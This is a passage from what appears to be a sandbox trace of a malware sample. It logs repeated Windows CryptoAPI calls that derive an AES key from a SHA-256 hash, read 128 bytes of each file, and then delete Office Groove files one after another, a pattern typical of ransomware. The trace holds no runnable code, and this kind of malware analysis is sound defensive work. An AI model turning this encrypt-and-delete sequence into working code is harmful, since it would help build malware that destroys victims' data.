(in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0167.536] ReadFile (in: hFile=0x4e4, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0167.541] CryptDestroyHash (hHash=0x284d668) returned 1 [0167.541] CryptDestroyKey (hKey=0x284d728) returned 1 [0167.541] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.543] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\_help.txt")) returned 1 [0167.545] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.546] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.546] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.546] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.546] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8f6 [0167.546] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.562] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.562] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.562] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.564] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsVersion1Warning.htm" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsversion1warning.htm")) returned 1 [0167.566] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.567] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.567] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.567] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.567] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ee3 [0167.567] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.571] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.571] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.571] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.573] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewattachmenticons.jpg")) returned 1 [0167.575] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.576] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.576] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.576] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.576] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x638 [0167.576] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.614] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.614] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.614] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.615] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewAttachmentIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewattachmenticonsmask.bmp")) returned 1 [0167.618] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.619] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.619] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.619] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.619] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1313 [0167.619] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.627] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.627] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.627] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.629] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewframe.html")) returned 1 [0167.631] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.632] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.632] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.632] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.632] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa89 [0167.632] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.635] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.635] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.635] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.636] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewtemplate.html")) returned 1 [0167.638] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.639] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.639] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.639] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.639] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1bfb [0167.639] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.685] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.685] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.685] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formtoolimages.jpg")) returned 1 [0167.688] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.689] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.689] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.689] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.689] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x23ed [0167.689] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.708] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.708] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.708] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.710] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\form_edit.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form_edit.js")) returned 1 [0167.712] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.713] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.713] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.713] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.713] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30074 [0167.713] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.752] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.752] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.752] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.754] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\macroprogress.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\macroprogress.gif")) returned 1 [0167.756] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.757] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.757] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.757] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.757] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1018 [0167.757] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.775] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.775] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.775] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.777] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\PublicFunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\publicfunctions.js")) returned 1 [0167.786] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.787] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.787] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.787] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.787] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x350 [0167.787] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.825] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.825] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.825] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.827] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_alignleft.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_alignleft.gif")) returned 1 [0167.829] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.830] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.830] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.830] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.830] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x34f [0167.830] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.879] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.879] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.879] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.881] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_alignright.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_alignright.gif")) returned 1 [0167.895] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.895] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.895] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.895] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.895] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x365 [0167.896] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.907] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.907] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.907] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_bullets.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_bullets.gif")) returned 1 [0167.911] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.911] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.911] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.911] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.911] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x34f [0167.912] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.914] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.915] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.915] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.916] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_center.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_center.gif")) returned 1 [0167.919] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.920] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.920] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.920] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.920] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ee [0167.920] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.927] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.927] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.927] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.928] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_choosecolor.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_choosecolor.gif")) returned 1 [0167.930] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.931] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.931] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.931] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.931] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x37a [0167.931] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.934] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.934] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.934] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.936] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_choosefont.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_choosefont.gif")) returned 1 [0167.937] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.938] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.938] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.938] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.938] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35f [0167.938] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.941] CryptDestroyHash (hHash=0x284d728) returned 1 [0167.941] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.941] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.943] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_decreaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_decreaseindent.gif")) returned 1 [0167.945] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.946] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.946] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.946] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.946] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35d [0167.946] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0167.949] CryptDestroyHash (hHash=0x284d628) returned 1 [0167.949] CryptDestroyKey (hKey=0x284d6e8) returned 1 [0167.949] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0167.951] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_increaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_increaseindent.gif")) returned 1 [0167.953] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0167.954] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0167.954] CryptHashData (hHash=0x284d728, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0167.954] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d728, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d6e8) returned 1 [0167.954] GetFileSize (in: hFile=0x510, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x354 [0167.954] ReadFile (in: hFile=0x510, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 